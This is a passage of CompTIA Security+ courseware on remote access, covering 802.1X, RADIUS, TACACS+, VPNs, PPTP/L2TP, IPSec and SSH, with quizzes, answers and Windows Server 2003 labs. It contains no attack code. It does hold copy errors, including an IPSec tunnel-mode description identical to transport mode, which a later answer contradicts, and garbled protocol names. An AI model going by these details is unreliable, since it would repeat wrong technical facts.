system is switched off or unplugged from the network. This leaves the system
vulnerable to hackers.

Cable modem
A cable modem is an external device that allows your computer to connect to the
Internet through a cable TV wire. The cable runs from your neighborhood to a central
location, referred to as the headend. Additional equipment is installed there that
communicates to all the cable modems in subscribers’ homes. Cable modems translate
radio frequency (RF) signals to and from the cable plant into Internet Protocol (IP).
For those who can get it in their area, cable modem service has quickly become a
popular high-speed alternative due to competitive costs and very high speeds; however,
there are some drawbacks. Since this is a shared server, bandwidth diminishes as more
local users simultaneously access the Internet. In addition, as the connection to the
Internet is always open, the system is vulnerable to attacks by hackers.

Protecting the network
The solution to securing remote access to a network is twofold:
    • Authenticate users — Authentication mechanisms include IEEE 802.1X, Remote
      Authentication Dial-In User Service (RADIUS), and Terminal Access Controller
      Access Control System (TACACS+).
    • Encrypt data flows — Encryption mechanisms include Point-to-Point Tunneling
      Protocol (PPTP), Layer Two Tunneling Protocol (T2TP), IP Security protocol
      (IPSec), and Secure Shell (SSH).
4–4      CompTIA Security+ Certification

Do it!              A-1:      Reviewing communications mediums
                      Questions and answers
                       1 Dial-up connections use _________ and _______ protocols to dial up and connect
                         to a remote access server.

                          SLIP, PPP

                       2 What are some of the vulnerabilities of phone lines?

                          They are susceptible to war dialing.

                       3 What are some of the drawbacks to using cable modems?

                          Bandwidth diminishes as more local users simultaneously access the Internet. As the
                          connection to the Internet is always open, the system is vulnerable to attacks by hackers.

                       4 Which ISDN channel is used to carry voice and data?
                          A    Channel A
                          B    Channel B
                          C    Delta channel
                          D    BRI channel

                       5 PPP uses _______ and ________ protocols to authenticate users.
                          A    PAP and CHAP
                          B    PSTN and SLIP
                          C    SLIP and PAP
                          D    DSL and ISDN
                                                                                          Remote access      4–5


Topic B: Authentication
              This topic covers the following CompTIA Security+exam objective:

               #       Objective

               2.1     Recognize and understand the administration of the following types of remote access
                       technologies
                        • 802.1x
                        • TACACS (Terminal Access Controller Access Control System)
                        • Radius




              Security protocols
Explanation   When a corporation adds remote users to their corporate network, it faces a new range
              of security issues: the users are communicating over an open line, or using remote
              access applications over the Internet. This enables an unauthorized user to snoop or
              launch replay and man-in-the-middle attacks against the network.
              Authenticating remote users requires additional security measures to ensure data is
              protected over an unsecured communication medium. First, usernames and passwords
              must be encrypted. Second, corporate policies, including access control lists, must be
              maintained. Finally, all communications must be monitored and logged for auditing
              purposes.
              The following security protocols provide solutions to these issues:
                     • IEEE 802.1X
                     • Remote Authentication Dial-In User Service (RADIUS)
                     • Terminal Access Controller Access Control System (TACACS+)

              IEEE 802.1X
              Our discussion of the IEEE 802.1X protocol begins with PPP. PPP is a protocol for
              communication between two computers using a serial interface, typically a personal
              computer connected by phone line to a server. Once the connection is established, PPP
              can negotiate an authentication protocol to authenticate the user. The traditional
              authentication method has been either PAP or CHAP, although PAP is not considered
              secure.
              Extensible Authentication Protocol (EAP) extended the capabilities of PPP to
              encompass a range of new authentication methods, including token cards, one-time
              passwords, certificates, and biometrics. It describes standards to ensure compatibility
              and interoperability between the remote user, an access point or switch, and an
              authentication server, such as RADIUS. EAP deals exclusively with the authentication
              process.
              IEEE 802.1X provides a standard for authenticating and controlling user traffic to a
              protected network. It does not provide the actual authentication mechanism, but instead
              uses the EAP protocol to define how authentication takes place.
4–6   CompTIA Security+ Certification

                 There are several forms of EAP offering different levels of security and support for
                 wired and wireless LANs:
                     • EAP over IP (EAPoIP)
                     • EAP over LAN (EAPOL)
                     • Message Digest Algorithm/Challenge-Handshake Authentication Protocol
                       (EAP-MD5-CHAP)
                     • Transport Layer Security (EAP-TLS)
                     • Tunneled Transport Layer Security (EAP-TTLS)
                     • RADIUS
                     • Light Extensible Authentication Protocol 9 (LEAP) Cisco

                 IEEE 802.1X conversation
                 Depending on the version of EAP running, the authentication exchange will vary. The
                 following exchange describes a wireless LAN using 802.1X:
                     1 A client (known as the supplicant) tries to connect to a wireless access point
                         (known as the authenticator).
                      2 The access point (authenticator) detects the client and enables the client’s port. It
                         forces the port into an unauthorized state, so only 802.1X traffic is forwarded.
                         All other traffic, such as HTTP, DHCP, and POP3 packets are blocked.
                      3 The supplicant sends an EAP-start message.
                      4 The authenticator sends an EAP-request identity message requesting the user’s
                         identity.
                      5 The supplicant sends the identity to the authenticator.
                      6 The authenticator forwards the identity to the authentication server. The
                         authentication server might use RADIUS, although 802.1X does not specify it.
                      7 The authentication server authenticates the user. The result is either an accept or
                         a reject packet.
                      8 The authentication server returns the result to the authenticator.
                      9 Upon receiving the accept packet, the authenticator opens the client’s port for
                         other types of traffic.
                      10 At logoff, the client sends an EAP-logoff message. This forces the access point
                         to transition the client port to an unauthorized state.
                 Exhibit 4-1 uses a RADIUS server as an example.
                                                                 Remote access       4–7



.




    Exhibit 4-1: IEEE 802.1X conversation

    For information on the latest developments on IEEE standards, visit the following Web
    site:
       http://www.ieee.org
4–8      CompTIA Security+ Certification

Do it!              B-1:      Discussing IEEE 802.1X
                      Questions and answers
                       1 The point of authentication for remote access to a central LAN is usually some
                         type of network access server. True or false?

                          True

                       2 PPP establishes a link between remote systems. True or false?

                          True

                       3 EAP is the acronym for _____________________.
                          A      Extended Authorization Protocol
                          B      Extended Authentication Protocol
                          C      Extensible Authentication Protocol
                          D      Extensible Administrative Protocol

                       4 EAP supports multiple authentication methods including:
                          A      One-time passwords
                          B      Certificates
                          C      Token cards
                          D      Shared keys

                       5 What are the three components in the 802.1X authentication exchange?
                          A      Supplicant, authenticator, authenticating server
                          B      RADIUS client, authenticator, authenticating server
                          C      Supplicant, RADIUS server, authenticating server
                          D      Supplicant, ISP, authenticator
                                                                              Remote access       4–9

              Remote Authentication Dial-In User Service
Explanation   Remote Authentication Dial-in User Service (RADIUS) provides a centralized system
              for authentication, authorization, and accounting. It is widely deployed in remote access
              networks to authenticate users.
              RADIUS has two components: a RADIUS client, which is typically a network access
              server such as a dial-up server, VPN server, or wireless access point, and a RADIUS
              server. The RADIUS client is located at a remote site; the server is located on the
              corporate LAN.
              All user authentication and network service access information is located on the
              RADIUS server. This information is contained in a variety of formats suitable to the
              user’s requirements. RADIUS in its generic form can authenticate users against a UNIX
              password file, Network Information Service (NIS), as well as a separately maintained
              RADIUS database.

              Authentication with a RADIUS server
              The RADIUS client sends authentication requests to the RADIUS server and acts on
              responses sent back by the server. RADIUS authenticates users through a series of
              communications between the client and the server using the User Datagram Protocol
              (UDP). After a user is authenticated, the client provides that user with access to the
              appropriate network services.
                  1 Using any of the remote access methods, the user connects to the RADIUS
                     client, which is also a network access server (NAS). After the connection is
                     established, the RADIUS client prompts the user for a name and password.
                  2 From this information, the RADIUS client creates a data packet called the
                     “access request.” This packet includes information identifying the specific
                     RADIUS client sending the access request, the port that is being used for the
                     connection, and the username and password.
                  3 For protection from eavesdropping hackers, the RADIUS client encrypts the
                     password using a shared secret.
                  4 The access request is sent over the network to the RADIUS server.
                  5 When the access request is received, the RADIUS server validates the request
                     and then decrypts the data packet using its shared secret to access the username
                     and password information. This information is passed on to the appropriate
                     security system being supported. This could be a UNIX password file, Kerberos,
                     or even a custom-developed security system.
                  6 If the username and password are correct, the server sends an access accept
                     message that includes information on the user’s network system and service
                     requirements. For example, the RADIUS server tells the RADIUS client that a
                     user needs TCP/IP, PPP, or SLIP to connect to the network. The
                     acknowledgment can even contain filtering information to limit a user’s access
                     to specific resources on the network.
                  7 If, at any point in this logon process, conditions are not met, the RADIUS server
                     sends an access reject to the RADIUS client, and the user is denied access to the
                     network. To ensure that requests from unauthorized users are not answered, the
                     RADIUS server sends an authentication key, or signature, identifying itself to
                     the RADIUS client.
4–10   CompTIA Security+ Certification

                      8 After this information is received by the NAS, it enables the necessary
                        configuration to deliver the right network services to the user. This process is
                        shown in Exhibit 4-2.




                  Exhibit 4-2: RADIUS


                  Benefits
                  The distributed approach to network security provides a number of benefits:
                      • Greater security — The RADIUS client/server architecture allows all security
                        information to be located in a single, central database, instead of scattered
                        around a network in several different devices. A single UNIX system running
                        RADIUS is much easier to secure and manage than several communications
                        servers located throughout a network.
                      • Scalable architecture — RADIUS creates a single, centrally located database of
                        users and available services, a feature particularly important for networks that
                        include large modem banks and more than one remote communications server.
                        The RADIUS server manages the authentication of the user and the access to
                        services from one location. Any device that supports RADIUS can be a
                        RADIUS client, so a remote user can gain access to the same services from any
                        communications server communicating with the RADIUS server.
                      • Open protocols — RADIUS is fully open, is distributed in source code format,
                        and can be adapted to work with systems and protocols already in use. This
                        feature potentially saves tremendous amounts of time by allowing organizations
                        to modify the RADIUS server to fit their network rather than rework their
                        network to incorporate the NAS. RADIUS can be modified for use with most
                        security systems on the market and works with any communications device that
                        supports the RADIUS client protocol. The RADIUS server has modifiable
                        “stubs” which enable customers to customize it to run with most security
                        technologies.
                                                                     Remote access        4–11

           • Future enhancements — As new security technology becomes available, the
             customer can take advantage of that security without waiting for added support
             to the NAS. The new technology need only be added to the RADIUS server by
             the customer or an outside resource. RADIUS also uses an extensible
             architecture, which means that as the type and complexity of service the NAS is
             required to deliver increases, RADIUS can be expanded to provide those
             services.

Do it!   B-2:   Authenticating with a RADIUS server
          Questions and answers
          1 The RADIUS client/server architecture allows all security information to be
            located in a single, central database. True or false?

            True

          2 RADIUS supports most communication and security technologies. True or false?

            True

          3 RADIUS is not expandable. True or false?

            False: It is expandable.

          4 Which of the following cannot be used as a RADIUS client?
            A      VPN server
            B      Wireless access point
            C      Network access server
            D      Windows workstation

          5 Which services are provided by RADIUS? (Choose all that apply.)
            A      Authentication
            B      Auditing
            C      Authorization
            D      Tunneling
4–12      CompTIA Security+ Certification

                     Terminal Access Controller Access Control System
Explanation          The Terminal Access Controller Access Control System (TACACS+) is an authentication
                     protocol developed by Cisco Systems to address the need for a scalable authentication
                     solution. It is the third generation of TACACS protocols: the original protocol,
                     TACACS, did not provide accounting functions. This was replaced by XTACACS,
                     which separated the functions of authentication, authorization, and accounting.
                     TACACS+ is a proprietary version and an entirely new protocol.

                     TACACS+ conversation
                     When a user attempts to remotely access a central LAN, the user sends an authorization
                     request to the TACACS+ server. The server then sends a reply asking for the username.
                     The user inputs a username, and this is sent to the TACACS+ server, which then
                     requests a password. The user inputs a password, which is verified against a database by
                     the TACACS+ server. If successful, the authentication portion of the logon process is
                     complete. At this point, the user’s computer negotiates with the TACACS+ server what
                     the authorization settings are. While this happens, the TACACS+ server records the
                     activities being performed by the remote user into a database for future security audits if
                     necessary. The process for client-side tunneling is shown in Exhibit 4-3.




                     Exhibit 4-3: TACACS+
                                                                                        Remote access      4–13

                         Comparing TACACS+ and RADIUS
                         TACACS+ uses TCP for its transport (unlike RADIUS, which uses UDP). TCP offers
                         several advantages over UDP, primarily a connection-oriented transmission. RADIUS
                         uses UDP, so it requires additional functions such as retransmit attempts and time-outs
                         to compensate for the connectionless transmission. Using TCP offers a separate
                         acknowledgement that a request has been received within the network, regardless of
                         how loaded or slow the authentication mechanism might be. It also provides immediate
                         indication of a crashed server because acknowledgements would not be forthcoming.
                         While RADIUS only encrypts the password in the packet that is passed from client to
                         server, TACACS+ encrypts the entire body of the packet including username,
                         authorized services, and other information.
                         RADIUS combines the authentication and authorization packets, it is difficult to
                         separate these functions. TACACS+ separates authentication, authorization, and
                         accounting, which allows for separate authentication solutions: a user can logon using a
                         Kerberos server for authentication and a TACACS+ server for authorization and
                         accounting.
If students are not      Another advantage to using TACACS+ is that it offers multiple protocol support while
familiar with the        RADIUS does not. Specifically, AppleTalk Remote Access, NetBIOS Frame Protocol
protocols, you can
briefly describe them.   Control, Novell Asynchronous Services Interface, and X.25 PAD connections cannot be
                         supported by RADIUS. TACACS+ is able to support all of these protocols.
4–14     CompTIA Security+ Certification

Do it!              B-3:     Enabling dial-in access
                      Here’s how                         Here’s why
                       1 Click Start                     You are logged in as Administrator.

                       2 Right-click My Computer         Windows Server 2003 does not allow dial-in
                                                         access by default. In order to allow remote
                                                         access to a Windows Server 2003 server, you
                                                         must configure the Remote Access Permissions
                                                         on a user-by-user basis.

                          Choose Manage

                       3 Expand Local Users and Groups

                          Select Users

                       4 Double-click Administrator

                       5 Activate the Dial-in tab

                          Select Allow access




                                                         Under Remote Access Permission (Dial-in or
                                                         VPN), as shown here.

                          Click OK

                       6 Double-click User1
                         and repeat step 5

                       7 Double-click User2
                         and repeat step 5

                       8 Close the Computer Management
                         window
                                                                     Remote access      4–15

Do it!   B-4:   Discussing authentication protocols
          Questions and answers
          1 TACACS+ cannot support AppleTalk Remote Access, NetBIOS Frame Protocol
            Control, Novell Asynchronous Services Interface, and X.25 PAD connections.
            True or false?

            False: TACACS+ can support all these protocols.

          2 Which of the following authentication protocols is geared toward wireless
            networks?
            A    TACACS+
            B    802.1X
            C    PPP
            D    RADIUS

          3 Which authentication protocol uses TCP for transport?

            TACACS+
4–16         CompTIA Security+ Certification


Topic C: Virtual private networks
                        This topic covers the following CompTIA Security+exam objective:

                         #       Objective

                         2.1     Recognize and understand the administration of the following types of remote access
                                 technologies
                                  • VPN (Virtual Private Network)
                                  • L2TP / PPTP (Layer Two Tunneling Protocol / Point to Point Tunneling Protocol)
                                  • SSH (Secure Shell)
                                  • IPSEC (Internet Protocol Security)




                        Types of VPNs
Explanation             A virtual private network (VPN) is a tool that enables the secure transmission of data
                        over unsecured networks, such as the Internet. Remote sites and users are able to access
                        their network information as if using a private network (hence the name virtual private
                        network) without the costs associated with long-distance calls or leased lines.
                        A VPN uses security procedures and tunneling protocols to maintain privacy. Tunneling
                        enables a foreign protocol to travel across a network by encapsulating (wrapping) it
                        inside the packets of the host network. The security protocols supply an additional level
                        of security by encrypting the data before transmission.
                        There are two types of VPN commonly used in corporate networks:
                               • Site-to-site VPN
                               • Remote access VPN

                        Site-to-site VPN
                        Site-to-site VPNs allow a corporation to connect to branch offices or other companies
                        over a public network. Each site requires a VPN gateway (dedicated hardware or a
The protocols listed    router running VPN server software) to connect to the Internet. The gateway-to-gateway
here are discussed
later in this Unit.
                        architecture logically operates as a WAN, connecting offices through multiple “private
                        tunnels” across the Internet. All locations must use identical encryption and
                        encapsulation protocols and settings—PPTP, L2TP and IPSec are the most common.
                        Each local area network connects to the Internet with a router. In order to receive
                        incoming calls, the corporate hub router employs dedicated lines to permanently
                        connect to a local ISP for incoming calls; branch offices might use either dedicated lines
                        or dial-up. In both cases, the routers establish a secure tunnel across the Internet.
                                                                 Remote access      4–17

Remote access VPN
Companies that have many telecommuting employees will use remote access VPNs,
also called virtual private dial-up networks (VPDNs), to communicate long-distance.
The only cost involved is that of a local phone call to a local provider. The immediate
savings over the use of long-distance and toll-free calls can quickly recoup the startup
cost of implementing a VPN.

Equipment
Remote access VPNs can use a wide variety of communication modes, including analog
lines, ISDN lines, digital subscriber lines (DSL) and cable modems. The corporate
network has a VPN access point or server that is permanently connected to the Internet
and configured to accept incoming calls. The client is equipped with VPN client
software and has Internet access through an ISP. Both client and server must be running
the same encryption and encapsulation protocols.
There are many versions of VPN client software available to establish this type of
connectivity. Perhaps the most prominent and widely used is Microsoft L2TP/IPSec
VPN Client, which is included in Microsoft Windows XP, NT 4.0, 2000 and Server
2003. This feature has the capability of configuring modems and other remote access
devices as VPN adapters. For Microsoft Windows 2000 and Windows Server 2003
servers, the VPN Server software is already built into the product.

Operation
To establish a remote access VPN, the client uses a local Internet service provider (ISP)
to connect to the Internet. The client then starts the VPN client software, which creates a
virtual connection to the access point or corporate network. This allows the Internet
service provider to act merely as a transporter of a data stream that has been encrypted
prior to the initial transmission, as shown in Exhibit 4-4.




Exhibit 4-4: Client-side tunneling

An alternative to installing or configuring the client computer to initiate the necessary
security communications is to outsource the VPN to a service provider. With this type
of configuration, there is no need for the company to maintain client-side software or
configurations. When implementing this type of solution, however, encryption does not
happen until the data reaches the provider’s network.
4–18          CompTIA Security+ Certification

                            This results in an unsecured connection from the user’s computer to the provider’s
                            network access server, as shown in Exhibit 4-5. This also places the responsibility of
                            protecting corporate access to information with an external entity.




                            Exhibit 4-5: Service provider tunneling

                            In this scenario, remote users dial in to a service provider’s network or point of presence
                            (POP) via a local or toll-free number. The service provider, in turn, initiates a secure
                            encrypted tunnel to the corporate network. If security is of a high concern, this type of
                            implementation might not be the best choice.

                            VPN drawbacks
                            Cost benefits and flexibility aside, using VPNs does have its problems.
                            VPN devices are not completely fault tolerant although there are efforts underway to
                            address this issue. In addition, there are diverse choices when implementing VPNs.
                            Software solutions tend to have trouble processing the multitude of simultaneous
                            connections that occur on a large network. This problem can be mitigated by using a
                            hardware solution, but that requires a much higher cost. It’s also important to remember
                            there is no such thing as absolute security. As more security is added to a network,
                            project costs increase, and simplicity suffers according to a law of diminishing returns—
                            each incremental increase in security over a certain point becomes more and more
                            expensive. A proper balance in these issues must be determined and maintained.

Do it!                      C-1:    Configuring a Windows Server 2003 VPN server
                             Here’s how                                 Here’s why
This activity takes place     1 On Server-X, click Start
only at Server-X.
                                 Choose Administrative
                                 Tools, Routing and Remote
                                 Access

                              2 Right-click the server name             To configure the server.

                                 Choose Configure and                   The Routing and Remote Access Server Setup
                                 Enable Routing and                     Wizard will begin.
                                 Remote Access

                                 Click Next
                                                                                            Remote access       4–19

                             3 Select Remote Access (dial-
                               up or VPN)




                               Click Next                             The Remote Access window appears.

                             4 Check VPN

                               Click Next

Assist students with this    5 Select the network interface that      This machine has two NICs installed.
step, if necessary.            connects this server to the Internet

                               Click Next

                             6 Click Next                             To accept the default of automatically assigning
                                                                      IP addresses to remote clients

                             7 Click Next                             To accept the default value of No, use Routing
                                                                      and Remote Access to authenticate connection
                                                                      requests.

                             8 Click Finish                           To start the Routing and Remote Access service.

                             9 Click OK                               If prompted about configuring the DHCP Relay
                                                                      Agent.

Explain to students they    10 Close the Routing and Remote
will connect to this VPN       Access window
server from Server-Y in a
later activity.
4–20     CompTIA Security+ Certification

Do it!              C-2:      Understanding VPNs
                      Questions and answers
                       1 Tunneling is accomplished by _____________ the data packets within the packets
                         of the host network.
                          A    authenticating
                          B    encapsulating
                          C    decrypting
                          D    encrypting

                       2 Explain the difference between site-to-site and remote access VPNs.

                          Site-to-Site VPNs connect branch offices to the corporate network over the Internet using
                          VPN gateways, in essence creating a WAN. Remote access VPNs are used to connect mobile
                          users to the corporate network. The remote users must use a VPN client software to connect
                          to the ISP, and then establish a tunnel.
                                                                             Remote access     4–21

              Tunneling protocols
Explanation   Tunneling hides or “encapsulates” the original packet inside a new packet. The new
              packet has new addressing and routing information, which enables it to travel across
              networks. When the new packet arrives at the destination network, the tunneling
              protocols are stripped away, exposing the original packet. Two commonly used
              tunneling protocols are Point-to-Point Tunneling Protocol (PPTP) and Layer Two
              Tunneling Protocol (L2TP).

              Point-to-Point Tunneling Protocol (PPTP)
              The Point-to-Point Tunneling Protocol (PPTP) protocol is built upon the well-
              established Internet protocols of PPP (Point-to-Point Protocol) and Transmission
              Control Protocol/Internet Protocol (TCP/IP). PPP provides authentication, encryption
              and compression of data sent over analog telephone lines. TCP/IP provides a transport
              mechanism for conveying digital data over the Internet infrastructure. When a user
              phones into an ISP to connect to the Internet, the data is sent to the ISP over a PPP
              connection but then repackaged for transport over the Internet. This process uses
              tunneling.
              In the case of data sent over phone lines, the original data packets are encapsulated
              within a PPP packet using Generic Routing Encapsulation Protocol version 2 (GRE v2).
              PPTP then encrypts and encapsulates the PPP packets within IP datagram’s for
              transmission through the Internet.
              PPTP does much more than deliver messages. After a PPTP link has been established, it
              provides its users with a virtual node on the corporate LAN or WAN. PPTP uses
              Microsoft point-to-point encryption (MPPE) to encrypt the data packets, and an
              authentication protocol such as PAP or CHAP to verify users’ identities before granting
              access to the corporate network.
              PPTP employs TCP packets to perform status inquiry and signaling over the network.
              The control packets are transmitted over a separate control channel and perform the
              following tasks:
                  • Query the status of communications servers
                  • Provide in-band management
                  • Allocate channels and places outgoing calls
                  • Notify Windows NT/2000/Server 2003 servers of incoming calls
                  • Transmit and receive user data with bi-directional flow control
                  • Notify Windows NT/2000/Server 2003 servers of disconnected calls
                  • Assure data integrity, while making the most efficient use of network bandwidth
                    by tightly coordinating the packet flow

              Layer Two Tunneling Protocol (L2TP)
              Layer Two Tunneling Protocol (L2TP) combines the best features of PPTP with the L2F
              protocol created by Cisco Systems to provide tunneling capabilities over IP, X.25,
              Frame Relay, and Asynchronous Transfer Mode (ATM) infrastructures. LT2P uses UDP
              to encapsulate PPP frames within L2TP headers as the tunneled data. As it has no native
              encryption capabilities, L2TP must rely on other encryption technologies, such as IPSec,
              to encrypt the data frames. Authentication is accomplished using TACACS+ or
              RADIUS.
4–22   CompTIA Security+ Certification

                  The following is a comparison of L2TP and PPTP:

                   Feature               L2TP                                    PPTP

                   Encryption            No native encryption relies on other    Native PPP encryption, not
                                         encryption protocols, such as IPSec.    compatible with IPSec.

                                                                                 Encrypts data, but negotiations
                                                                                 sent in plaintext.

                   Authentication        RADIUS, TACACS+                         Standard PPP authentication
                                                                                 using PAP, CHAP or MS-CHAP
                                         Computer-level authentication uses      protocols.
                                         certificate infrastructure, and user-
                                         level uses PPP authentication.

                   Data protocols        IP, IPX, SNA, NetBEUI                   IP only

                   Control port          UDP 1701                                TCP 1723



                  IP Security protocol
                  IP Security Protocol (IPSec) is a suite of protocols used for encrypting data so it can
                  travel securely over a public IP network. It uses OSI layer 3, the network layer, to send
                  encrypted communications between two network devices. It’s commonly used to secure
                  VPN communications over an open network.

                  IPSec protocols
                  The IPSec protocol suite is made up of four separate protocols:
                     • Authentication Header (AH) protocol signs the data packets using MD5 or SHA-
                         1 hashes and a shared secret key. This guarantees authenticity.
                      • Encapsulating Security Payload (ESP) protocol encrypts the packet using a
                        symmetric encryption algorithm (DES or 3DES) and shared secret key. This
                        ensures confidentiality.
                      • IP Payload Compression Protocol (IPComp) compresses the data packet before
                        transmission. When used in combination with ESP encryption, the compression
                        is applied to the packet before encryption.
                      • Internet Key Exchange (IKE) provides an automated method for negotiating the
                        shared secret keys.
                  The protocols might be applied alone or in combination.

                  IPSec encryption modes
                  IPSec also offers two modes of encryption: transport and tunnel.
                      • Transport mode encrypts the data portion of each packet, but not the header.
                        This mode is used in host-to-host (peer-to-peer) communications.data portion of
                        each packet
                      • Tunnel mode encrypts the date portion of each packet, but not the header.
                        Tunneling allows you to hide the source and destination addresses from hackers.
                        This mode is used by VPN gateways.
                  To use IPSec, both the sender and the recipient must be IPSec compliant.
                                                                                           Remote access      4–23

                         How it works
                         To communicate using IPSec, the following steps must take place:
                             1 An administrator creates an IPSec policy. This contains a set of rules that define
                               what types of traffic (for example, HTTP or FTP) require encryption and which
                               encryption and/or authentications protocols to use. Each rule can specify
                               multiple authentication methods.
                             2 The administrator distributes the IPSec policy to all targeted machines.
                             3 The two hosts automatically negotiate the authentication and encryption method
                               to be used for communication. Which protocols are selected depends on the
                               IPSec policy.
                             4 If the selected protocol requires negotiating secret keys, the IKE is employed.
                               One of three methods is implemented:
                                  • Both parties use a password known as a pre-shared key. The two parties
                                    swap a hashed version of the pre-shared key, and then attempt to recreate
                                    the hashed data. If successful, both parties can begin secure
                                    communications.
                                • Both parties exchange public keys that have been certified by a CA.
                                • Both parties use Kerberos v5 for authentication.
                             5 The IP packets are encrypted and/or signed according to the negotiated terms.
                         All functions of IPSec remain transparent to the user.

                         Secure Shell
                         A secure shell (SSH) is a secure replacement for remote logon and file transfer programs
                         such as Telnet and FTP, which transmit data in unencrypted text. SSH uses a public key
Tell students that in    authentication method to establish an encrypted and secure connection from the user’s
SSH, public key          machine to the remote machine. When the secure connection is established, then the
authentication is used
before a connection is   username, password, and all other information is sent over this secure connection.
established. Mention     SSH is becoming a standard for remote logon administration. It has become so popular
that SSH is rapidly
replacing Telnet for     there are many ports of SSH for various platforms, and there are free clients available to
remote administration    log on to an SSH server from many platforms as well. SSH Certifier is designed to be a
of UNIX and Linux        widely applicable product, and it runs on a wide variety of different platforms including
systems, and even        Windows, Linux, HP-UX and Solaris.
some Windows
systems.                 In the enrollment process, the end-user requesting a certificate must be authenticated. If
                         the entity has a valid certificate, the private key can be used for authentication when
                         using certain enrollment protocols; however, the user does not typically possess a valid
                         private key for the enrollment process. First-time authentication can be done either
                         manually or by generating shared secrets for entities. When shared keys are delivered to
                         end entities by secure means, the users can authenticate themselves during the online
                         enrollment, and the request can be approved automatically, if the policy allows
                         automatic acceptance.
                         This method is especially useful in applications in which shared secrets can be delivered
                         in the same package with the client software and certification authority certificate. If the
                         enrollment protocol does not support shared secrets or they are just not used,
                         authentication has to be done in an out-of-band way, such as by showing valid identity
                         information for the operator. The operator can then make the approval decision
                         manually.
4–24          CompTIA Security+ Certification

                               The authentication requirements and the certificate templates for the certificate issuance
                               are defined in the certification policy. The policy can be configured via the
                               administration graphical user interface.
                               The key components of an SSH product are the engine, the administration server, the
                               enrollment gateway, and the publishing server. Each of these components can be placed
                               either on separate machines or on a single machine.
                                   • The engine receives certification requests from the enrollment gateway, makes
                                     policy decisions, and generates and signs certificates and Certificate Revocation
                                     Lists (CRLs). The engine also communicates with the administration server and
                                     performs the required database queries.
                                   • The administration server is an HTTP server with a Transport layer security
                                     (TLS) implementation. The graphical user interface can be easily customized by
                                     modifying the HTML code, also by using the script tools of Certifier, the
                                     functionality of the GUI can be expanded.
                                   • The enrollment gateway has the server-side implementations of the supported
                                     certificate enrollment protocols. It receives certificate requests from the
                                     enrollment clients and forwards them to the engine for policy decisions. The
                                     enrollment gateway also sends confirmation messages and issues certificates to
                                     end entities.
                                   • The issued certificates and CRLs are sent to the publishing server, which
                                     performs the LDAP publishing in the directory.
                               For more information on IPSec and SSH, visit www.ssh.com.

Do it!                         C-3: Using PPTP to connect to a VPN server
                                Here’s how                                 Here’s why
Students will perform this       1 On Server-Y, click Start
activity in pairs on Server-
X and Server-Y as
indicated in the activity
                                 2 Choose Control Panel,
steps.                              Network Connections, New
                                    Connection Wizard
If students are prompted
to provide Location              3 Click Next
information, tell them to
enter an area code and
click OK twice.                  4 Select Connect to the
                                    network at my workplace

                                    Click Next

                                 5 Select Virtual Private
                                    Network connection

                                    Click Next

                                 6 Type Class VPN PPTP                     To specify a name for the connection

                                    Click Next
                                                              Remote access         4–25

 7 Enter the IP address of the VPN     If you don't know Server-X's IP address, have
   server (Server-X)                   your partner open a Command window, enter
                                       ipconfig and note the server's IP address.

   Click Next

 8 Select Anyone's use

   Click Next

 9 Check Add a shortcut to this
   connection to my desktop

10 Click Finish                        You are prompted to log on.

11 Log on as Administrator             You are now connected to Server-X.

12 On Server-X, access Computer        To configure the Administrator account to
   Management                          require a remote access policy for access.

13 Change the Administrator user's     Activate the Dial-in tab in the Properties of the
   dial-in access to Control           Administrator user to see the option.
   access through Remote
   Access Policy

14 At Server-Y, disconnect the Class   The connection is denied because an appropriate
   VPN PPTP connection and try to      remote access policy has not been configured.
   connect again

15 Close all windows
4–26     CompTIA Security+ Certification

Do it!              C-4:      Discussing tunneling protocols
                      Questions and answers
                       1 TCP/IP transports digital data over the Internet infrastructure. True or false?

                          True

                       2 Data sent from a dial-up modem is encapsulated within a(n) _______ packet.
                          A      PPP
                          B      IP
                          C      IPX
                          D      NetBEUI

                       3 PPTP uses IPSec to authenticate users. True or false?

                          False: It uses PPP for authentication.

                       4 LT2P uses UDP to encapsulate PPP frames with L2TP headers. True or false?

                          True

                       5 L2TP provides tunneling capabilities for which of the following internetworks?
                          A      Frame Relay
                          B      ATM
                          C      IP
                          D      All of the above

                       6 Describe the differences in the IPSec transport and tunnel modes.

                          Transport mode encrypts the data portion of each packet, but not the header. It’s typically
                          used in host-to-host VPNs. Tunnel mode encrypts both the header and the data portion of
                          each packet. It’s used in host-to-gateway or gateway-to-gateway VPN communications.

                       7 Which protocol uses the IKE public key system to certify and sign data packets?

                          Authentication header

                       8 Which protocol uses symmetric encryption to encrypt the IP payload for
                         confidentiality?

                          Encapsulating security payload

                       9 Which of the following protocols can be used with PPTP?
                          A      IPX/SPX
                          B      NetBEUI
                          C      TCP/IP
                          D      AppleTalk
                                                                                        Remote access      4–27


Topic D: Telecommuting vulnerabilities
              This topic covers the following CompTIA Security+exam objective:

               #     Objective

               2.1   Recognize and understand the administration of the following types of remote access
                     technologies

                     •   Vulnerabilities




              Telecommuting
Explanation   Many large companies have begun using remote access technologies as a method to
              reduce costs and improve employee satisfaction. The benefits gained by telecommuting
              must be carefully weighed against the increased vulnerabilities.
              In the telecommuting model, the home office is arguably not trusted. The lack of
              physical access control would indicate that no matter how trusted a computer is when
              first configured, after spending time at a user’s home, the state of a machine is in
              question.

              Security issues
              Although VPNs and encryption are powerful tools, they do not protect against all
              threats. Misconfigured firewalls, unrestricted physical access, weak encryption, and
              sporadic auditing leave the remote PC an easy target for attackers.

              Split tunneling
              The simplest VPN configuration consists of a VPN client computer with an Internet
              connection. This setup can introduce a major risk called split tunneling. Split tunneling
              allows a remote PC to surf the Web and access the corporate VPN simultaneously. The
              benefit of split tunneling is that corporations can conserve bandwidth needed for
              Internet access at VPN hub sites and reduce the load on VPN gateways. The drawback
              is that, if a remote PC is connected directly to the Web and at the same time tied into the
              VPN, attackers coming on from the Web could commandeer the PC and gain access to
              the corporate network.
              The integrity of the remote PC can just as easily be compromised while the user is Web
              surfing with the VPN tunnel turned off. Viruses or back doors downloaded while
              surfing would threaten the VPN the next time it is connected.

              Unsecured data files
              As telecommuters download data files to their home PCs, all safeguards implemented at
              the corporate office to protect sensitive information are negated. The central office has
              legally lost control over that data.
              With limited physical protection, hackers can steal portable computers or hard drives
              and, given enough time, break any security in place. The attacker can gain access to
              corporate data and, potentially, the corporate network.
4–28   CompTIA Security+ Certification

                  Compromised certificates
                  Many IT professionals use digital certificates to add a layer of security to their VPN
                  clients. In the context of a computer system in an uncontrolled environment, the
                  certificate can be more vulnerable than traditional password authentication. The attacker
                  can easily crack a weak pass-phrase using brute force. Once compromised, the
                  certificate could be used to authenticate the attacker to the central office and even other
